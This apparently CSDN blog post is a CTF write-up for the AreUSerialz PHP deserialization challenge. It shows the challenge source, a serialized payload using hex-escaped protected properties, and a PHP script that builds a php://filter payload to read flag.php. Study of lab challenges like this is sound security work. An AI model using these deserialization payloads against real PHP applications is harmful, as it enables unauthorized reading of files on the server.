2021-09-21-网鼎杯AreUSerialz

最新推荐文章于 2022-09-27 23:18:00 发布
原创 最新推荐文章于 2022-09-27 23:18:00 发布 · 464 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#php

本文详细解析了一个PHP反序列化漏洞案例,介绍了如何利用该漏洞读取文件内容,并提供了绕过限制的具体方法。

文章目录

前言–php反序列化

地址:buuctf

代码显示

<?php

include("flag.php");

highlight_file(__FILE__);

class FileHandler {
    protected $op;
    protected $filename;
    protected $content;
    function __construct() {
        $op = "1";
        $filename = "/tmp/tmpfile";
        $content = "Hello World!";
        $this->process();
    }
    public function process() {
        if($this->op == "1") {
            $this->write();
        } else if($this->op == "2") {
            $res = $this->read();
            $this->output($res);
        } else {
            $this->output("Bad Hacker!");
        }
    }
    private function write() {
        if(isset($this->filename) && isset($this->content)) {
            if(strlen((string)$this->content) > 100) {
                $this->output("Too long!");
                die();
            }
            $res = file_put_contents($this->filename, $this->content);
            if($res) $this->output("Successful!");
            else $this->output("Failed!");
        } else {
            $this->output("Failed!");
        }
    }
    private function read() {
        $res = "";
        if(isset($this->filename)) {
            $res = file_get_contents($this->filename);
        }
        return $res;
    }
    private function output($s) {
        echo "[Result]: <br>";
        echo $s;
    }
    function __destruct() {
        if($this->op === "2")
            $this->op = "1";
        $this->content = "";
        $this->process();
    }
}
function is_valid($s) {
    for($i = 0; $i < strlen($s); $i++)
        if(!(ord($s[$i]) >= 32 && ord($s[$i]) <= 125))
            return false;
    return true;
}
if(isset($_GET{'str'})) {

    $str = (string)$_GET['str'];
    if(is_valid($str)) {
        $obj = unserialize($str);
    }
}

首先__construct是跟属性赋值,通过op的值,进入不同的函数
这人我们看到read()中有file_get_contents,可以利用此函数来读取文章内容。

我们需要绕过两个点:
1.__destruct中,需要利用一次,==和===的弱类型,这时我们可以使用$op=2
2. is_valid函数,是用来判断字符的Ascii码是否在32到125之间,就是用来判断是否是可见字符。
3. 在构造属性为protected时(private也会),会出现不可见字符。
处理方法:

1.PHP7.1以上版本对属性类型不敏感,public属性序列化不会出现不可见字符,可以用public属性来绕过

2.private属性序列化的时候会引入两个\x00,\x00中间是类名,注意这两个\x00就是ascii码为0的字符。
这个字符显示和输出可能看不到,甚至导致截断,但是url编码后就可以看得很清楚了。同理,
protected属性会引入\x00*\x00。此时,为了更加方便进行反序列化Payload的传输与显示,我们可以在
序列化内容中用大写S表示字符串,此时这个字符串就支持将后面的字符串用16进制表示。

O:11:"FileHandler":3:{S:5:"\00*\00op";i:2;S:11:"\00*\00filename";S:8:"flag.php";S:10:"\00*\00content";S:7:"oavinci";}
  1. 使用urlencode对serialize后的东西进行加密。但是这个对这个题是不行的。因为urlencode加密后的内容,被解码后,还是不能通过 is_valid()的验证。

所有,通过read(),来构造

<?php
class FileHandler {
 
    public $op = 2;
    public  $filename = "php://filter/read=convert.base64-encode/resource=flag.php";
}
 
$a=new FileHandler();
print(urlencode(serialize($a)));
?>

其中的filename,我们可以用php://filter伪协议,就可以获得flag
还可以直接赋值"flag.php’

参考文章

https://blog.youkuaiyun.com/Oavinci/article/details/106998738?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522163223991416780264079523%2522%252C%2522scm%2522%253A%252220140713.130102334..%2522%257D&request_id=163223991416780264079523&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~all~baidu_landing_v2~default-3-106998738.pc_search_result_hbase_insert&utm_term=%E7%BD%91%E9%BC%8E%E6%9D%AFAreUSerialz&spm=1018.2226.3001.4187
2021-07-28 CTF Webbuuoj [ 2020 半决赛]faka
LiNa_lInA_741的博客
07-28 1153
CTF Web buu oj[ 2020 半决赛]faka解题 [ 2020 半决赛]faka 解题 不会写站,做不了代码审计,就记录别人WP的解题思路,再回头来看 下载站源代码,html/applilcation/admin,站打开admin,跳到管理后台登录页面。 目录文件中有tk.sql文件,phpmyadmin先创建数据库,再导入tk.sql。 数据库打开表system_user,找到admin/md5后得密码 md5解密得到admin密码admincccbbb123 登
2020--青龙组-Web-AreUSerialz
最新发布
aheyor的博客
10-31 1126
这个题目不仅考察了对PHP反序列化的理解,还考察了代码审计和安全漏洞分析的能力。解决这个题目通常需要深入理解PHP的魔术方法和反序列化的原理,以及如何利用这些知识来绕过安全检查和执行非授权的操作。在解决这个题目时,关键在于理解反序列化的过程以及如何利用这个过程中可能存在的漏洞。参与者需要分析代码,找到反序列化的点,并利用这个点来执行某些操作,如读取敏感文件或执行系统命令。在这个题目中,参与者需要分析并解决一个涉及PHP反序列化漏洞的问题。类,其中包括几个关键的方法和属性。方法用于初始化类的属性,
2021-08-06ssrfme的绕过地址waf运用ssrf-redis-主从复制写shell题解
qq_45290991的博客
08-06 610
平台:buuoj.cn 直接给出源码 <?php function check_inner_ip($url) { $match_result=preg_match('/^(http|https|gopher|dict)?:\/\/.*(\/)?.*$/',$url)...
2021-8-7[ 2020 青龙组]AreUSerialz的wp(经典反序列化例题)
qq_45290991的博客
08-07 661
[ 2020 青龙组]AreUSerialz 目录 题目:在buu平台上,题目传送门 解题过程: 两个防护: is_valid() destruct()魔术方法 本地进行序列化操作 题目:在buu平台上 解题过程: 代码审计 <?php include("flag.php"); highlight_file(__FILE__); class FileHandler { ...
2021-10-17[ 2020 朱雀组]phpweb
qq_50613938的博客
10-17 265
在我们页面其实并没有看见什么有用的信息,我只能通过大佬wp来看见,原来我们捉包后的func参数和p参数是能传递执行函数的,首先我们 所以我们会想能不能执行file_get_contents函数来查看参数,查看index.php看到了参数 function gettime($func, $p) { $result = call_user_func($func, $p); $a= gettype($result); if ($a == "string") { return
第二届(第三场:朱雀组)Think Java
a3320315的博客
05-20 1909
首先题目给了一些class文件,这些不需要多说,直接jd-gui反编译或者使用fernflower反编译也可以 解题过程 先扫一下目录 得到swagger-ui.html 发现几个api接口 sql注入得到密码 源代码中明显存在SQL注入(dbName可控),但是必须满足两个条件,否则不能连接数据库 #号在引号里面时当做填充符,没有实际意义(这个只是在jdbc中这样?还没来得及验证) 最终: jdbc:mysql://mysqldbserver:3306/myapp#‘ union select
AreUSerialz-[ 2020 青龙组]-[传送门->BUUCTF]
qwsn
11-23 1875
0x01、Web 1.AreUSerialz-[ 2020 青龙组]-[传送门->BUUCTF] 第一步:打开题目环境,进行代码审计 <?php include("flag.php"); //文件包含flag.php highlight_file(__FILE__); //高亮显示当前页面源码 class FileHandler { //类:FileHandler protected $op; //保护属性:$op protected $
2020[青龙组]--AreUSerialz
Oavinci的博客
06-28 7444
知识点: PHP反序列化漏洞 弱类型比较 <?php include("flag.php"); highlight_file(__FILE__); class FileHandler { protected $op; protected $filename; protected $content; function __construct() { $op = "1"; $filename = "/tmp...
buuctf-[ 2020 青龙组]AreUSerialz(小宇特详解)
小宇的web博客
01-28 2878
buuctf-[ 2020 青龙组]AreUSerialz(小宇特详解) <?php include("flag.php"); highlight_file(__FILE__); class FileHandler { protected $op;//protected受保护的修饰符,被定义为受保护的类成员则可以被其自身以及其子类和父类访问 protected $filename; protected $content; function _
BUUCTF学习笔记-AreUSerialz 2020 青龙组
Emmawas的博客
09-27 330
BUUCTF学习笔记-AreUSerialz 2020 青龙组 含重要函数学习
2020 第二届 boom wp
01-20
2020 第二届 boom wp ​ ​ 卑微新手在线答题。。。。。 第二届-boom 下载附件得到一个boom.exe程序 打开是这样 根据提示继续 得到一串md5 加密的数据,使用在线解密 https://www.somd5.com/ 得到第一个答案 en5oy 继续下一个 解方程组,就直接硬着头皮的解答把 答案为: x=74 y=68 z=31 输入答案之后下一题 又是方程。。。。解一个 二元一次方程 x*x+x-7943722218936282=0 自己写了一个python脚本来解,脚本如下: import math print(“ax*x+bx+c=0”) a
Crypto 2020 you raise me up Writeup (离散对数)
01-20
关键点:离散对数、同余运算 知识点:Antigonae整理的相关概念 看不懂-.-以后再研究,简单理解为: 普通对数为 a ** x=b    (求x=logab) 离散对数为 a ** x=b % p 先会用SageMath~ 题目 #!/usr/bin/env python # -*- coding: utf-8 -*- from Crypto.Util.number import * import random n = 2 ** 512 m = random.randint(2, n-1) | 1 c = pow(m, bytes_to_long(flag), n) print 'm =
2020年第二届“络安全大赛重磅启动 (1).pdf
09-19
2020年第二届“络安全大赛重磅启动 (1).pdf
2020年第二届“络安全大赛重磅启动.pdf
09-19
2020年第二届“络安全大赛重磅启动.pdf
PHP反序列化漏洞&ctf实例
weixin_44769042的博客
09-22 1290
漏洞简介 php反序列化漏洞,又叫php对象注入漏洞。 简单来讲,就是在php反序列化的时候,反序列化的内容是用户可控,那么恶意用户就可以构造特定序列化内容的代码,通过unserialize()函数进行特定的反序列化操作,并且程序的某处存在一些敏感操作是写在类中的,那么就可以通过这段恶意代码,达到执行攻击者想要的操作。 漏洞形成原因 漏洞的形成的根本原因是程序没有对用户输入的反序列化字符串进行检测,导致反序列化过程可以被恶意控制,进而造成代码执行、getshell等一系列不可控的后果。 什么是序.
2020—— (青龙组)signal
热门推荐
寻梦&之璐
03-30 1万+
文章目录vm_operad函数功能read函数功能简介流程验证数据(逆向重点)逆向思维 vm_operad int __cdecl vm_operad(int *a1, int a2) { int result; // eax@2 char v3[100]; // [sp+13h] [bp-E5h]@4 char v4[100]; // [sp+77h] [bp-81h]@5 char v5; // [sp+DBh] [bp-1Dh]@5 int v6; // [sp+DCh] [bp-
2020_朱雀组_Web_nmap
m0_52199518的博客
04-06 562
WP 两个考察点 1.考察nmap的使用 2.考察escapeshellarg()与escapeshellcmd()混合使用的漏洞 第一个还好说,题目告诉了 第二个点嘛,不知道,完全不知道是从哪里获取到的,自闭ing 看其他师傅的wp,提到了[BUUCTF 2018]Online Tool,一道代码审计题,直接告诉了参数经过escapeshellarg()与escapeshellcmd()处理 两道题考察的点不能说一样,只能说完全一致。 nmap要用输出相关的参数 在nmap中文里查阅能有以下结果: -o
[ 2020 白虎组]PicDown
fmyyy1的博客
04-11 511
读源码 用get的方式提交参数,猜测存在文件读取。传flag 真就读到flag了,但肯定是非预期,参考wp。 我们都知道可以通过/proc/\$pid/来获取指定进程的信息,例如内存映射、CPU绑定信息等等。如果某个进程想要获取本进程的系统信息,就可以通过进程的pid来访问/proc/$pid/目录。但是这个方法还需要获取进程pid,在fork、daemon等情况下pid还可能发生变化。为了更方便的获取本进程的信息,linux提供了/proc/self/目录,这个目录比较独特,不同的进程访问该目录时获得
2020——Re
weixin_43781139的博客
05-11 1158
joker 当我看到这题的名叫joker的时候,我就知道,这题很美好,没好了。但是为了线下赛,我哭着下载了题目,然后,然后我就真哭了。 老规矩,拿到题目先查壳: 拿到有用信息,32位,无壳,gcc编译。 用ida看一下程序大体结构: 这里你会发现,按下f5会报错 这里是堆栈的问题,解决连接如下: https://blog.youkuaiyun.com/xiangshangbashaonian/article/details/81950110 反编译主函数: 发现整体思路很清晰吖,输入长度为24,接下来就是一堆
2022crypto583-linear题目解析与挑战
资源摘要信息:"2022crypto583-linear-homework题目附件" 该资源提到的标题和描述指向了一个与信息安全相关的竞赛题目的附件。""是一个常被提及的CTF(Capture The Flag,即夺旗赛)信息安全竞赛,而...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值